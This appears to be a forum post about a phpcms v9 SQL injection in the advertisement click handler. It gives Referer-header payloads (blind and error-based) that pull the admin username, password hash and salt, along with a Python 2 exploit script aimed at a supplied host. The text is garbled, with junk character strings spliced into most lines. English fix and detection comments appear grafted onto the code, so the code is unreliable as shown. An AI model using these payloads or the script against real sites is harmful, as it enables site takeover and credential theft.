有人放出了 phpcms v9 的 0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数:\phpcms\modules\poster\index.php
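public function poster_click() {
    // Record a click on advertisement $id and redirect the visitor to its link.
    //
    // Untrusted inputs handled here: $_GET['id'], $_GET['siteid'], $_GET['url'],
    // the 'username' cookie and the Referer header (HTTP_REFERER).
    // Returns false when no advertisement row matches $id; otherwise emits a
    // Location header and returns nothing.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // NOTE(review): cookie value and resolved area are passed through as before;
    // assumed to be sanitised upstream — confirm against param::get_cookie / ip_area.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    // The Referer header is attacker-controlled and, as the payloads quoted on
    // this page show, reached the INSERT unescaped. Escape it before use; the
    // durable fix is escaping/parameterisation inside the DB layer itself.
    $referer = addslashes(HTTP_REFERER);
    if ($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>$referer, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    // Only the link URLs configured for this advertisement are acceptable
    // redirect targets. Previously any caller-supplied ?url= was used verbatim
    // whenever more than one entry was configured, i.e. an open redirect.
    $allowed = array();
    foreach ($setting as $item) {
        if (is_array($item) && isset($item['linkurl'])) $allowed[] = (string)$item['linkurl'];
    }
    // Default target is the first configured link, as in the original logic.
    $url = isset($setting['1']['linkurl']) ? $setting['1']['linkurl'] : '';
    if (count($setting) != 1 && isset($_GET['url']) && in_array((string)$_GET['url'], $allowed, true)) {
        $url = $_GET['url'];
    }
    header('Location: '.$url);
}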
) ^1 ]- K5 M" d9 C. N, v
1 _1 w. a& s' V! ^5 c* V l$ D$ ~
利用方式:
( n' E% O5 J. N; M
1、可以采用盲注入的手法:
+ P/ S9 }8 N- ?: K* c4 v/ q& t
9 f3 P7 v, w& s5 N. \referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
* v. Y5 _6 [; n0 a; `+ h0 h5 i7 `. b: u h; q# {7 m8 W
通过返回页面正常与否,一个个猜解密码字段。
* S' p& X2 o, T O- e
2、代码是花开写的,随手附上了:
: Z: k6 E4 _5 q. |" P1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#/ s4 N( a- Y, g* Y
2 b8 u5 H9 R3 x/ L/ g3 S
此方法是报错注入手法,原理自查。
0 W8 e$ N- K6 O* `- D' v' G- N" p5 u. c; ]* j0 G
d+ {* A# y- m7 j2 V0 n
利用程序:
. \3 q2 C4 a& k# O#!/usr/bin/env python) ~& Q5 E+ N; K3 H/ i
import httplib,sys,re: F5 E% U6 C- E9 u6 k, S7 l
" n( x& h/ U0 E$ j% d
# Proof-of-concept for the poster_click injection described above: the whole
# SQL fragment travels in the Referer header of a single GET request, and the
# leaked values come back inside the server's own MySQL error text.
# Server-side mitigation is escaping/parameterising the Referer value before
# the INSERT and not returning raw database errors to clients.
# As copied from the forum the quotes are typographic (“ ”) and the code is
# Python 2 (print statement, httplib); it does not parse as shown.
def attack():
+ d4 h! X$ Y6 C) {& Z4 Kprint “Code by Pax.Mac Team conqu3r!”
2 h( p' O. K" Wprint “Welcome to our zone!!!”
# argv[1] is the target host, argv[2] the install path prefix.
7 y: u7 _9 \; ^+ J, ?url=sys.argv[1]
7 L W" y+ r" epaths=sys.argv[2]- R$ h) R- v" N7 ~
conn = httplib.HTTPConnection(url)
# Detection: the Referer carries a SELECT/concat/information_schema fragment
# and the request uses a fixed, dated Firefox 3.5 User-Agent string; both are
# matchable in web-server access logs or by a WAF rule on the Referer header.
0 b& P. z; ?+ _- [% N' Ui_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! Z. `, v. h' v( q5 {“Accept”: “text/plain”,
, I7 R6 m1 i2 e3 Y2 S/ m2 S“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# One request to the poster_click action; only id and sitespaceid go in the
# query string, the injection itself is in the headers above.
( z/ `6 n5 m! b# Qconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): X) u* y0 ^/ R0 I+ V
r1 = conn.getresponse()
1 e' o) e7 o+ j! Y/ vdatas=r1.read()! H& h3 h2 F( I5 P
# The data channel is the verbose "Duplicate entry ..." MySQL error echoed in
# the response body; suppressing DB error output closes this channel even
# before the injection itself is fixed.
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
# datas is empty when no such error string is present, so this raises IndexError.
; `2 Y. s% X% tprint datas[0]0 M& U" q5 `* {* ~. W
conn.close()! M, G. G8 U; M: d( G! z. U o
# Entry point: expects the host as argv[1] and the install path prefix
# ('/' or '/phpcmsv9/' in the examples printed below) as argv[2]; prints
# usage and exits with status 1 when fewer than two arguments are given.
if __name__==”__main__”:
6 ^- F: p( C2 o& \8 b- zif len(sys.argv)<3:; s, F! A( a5 U
print “Code by Pax.Mac Team conqu3r”0 P1 ^2 Z' X% [4 P
print “Usgae:” Q) Q* B6 ?, A0 a, Q5 S$ N
print “ phpcmsattack.py www.paxmac.org /”
: @+ z+ c s9 a1 @7 u: A% Mprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
+ p4 r9 X; O1 }2 v. G3 nsys.exit(1)
. e# S. ^* ^, n, b9 u7 |attack()5 P4 s9 O8 @3 W7 m! y$ f
, ]& j* B8 L: |3 y3 B4 F |